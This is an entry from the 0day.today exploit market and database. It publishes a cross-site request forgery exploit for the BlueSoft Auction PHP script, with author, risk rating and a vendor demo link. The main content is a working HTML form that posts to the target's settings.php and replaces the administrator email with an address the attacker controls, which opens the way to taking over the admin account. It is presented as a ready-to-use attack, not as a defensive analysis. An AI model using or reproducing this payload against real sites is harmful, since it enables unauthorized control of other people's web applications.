[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BlueSoft Auction CSRF Vulnerability

Author
Jonturk75
Risk
[
Security Risk Low
]
0day-ID
0day-ID-17688
Category
web applications
Date add
13-03-2012
Platform
php
# Exploit Title: BlueSoft Auction CSRF 
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/bluesoft-auction-site-script/31334/
# Category::  webapps
# Demo : http://shopbluesoft.com/demo4/control/login.php
# Greetz: Inj3ct0r Exploit DataBase 1337day.com


<form enctype="multipart/form-data" method="POST" action="target.com/[PATH]/settings.php" name="conf">
<input type="hidden" value="yourmail@mail.com" maxlength="100" size="45" name="adminmail"/> 
<input type="submit" value="Save changes" name="act"/> 
</form>



#  0day.today [2024-11-16]  #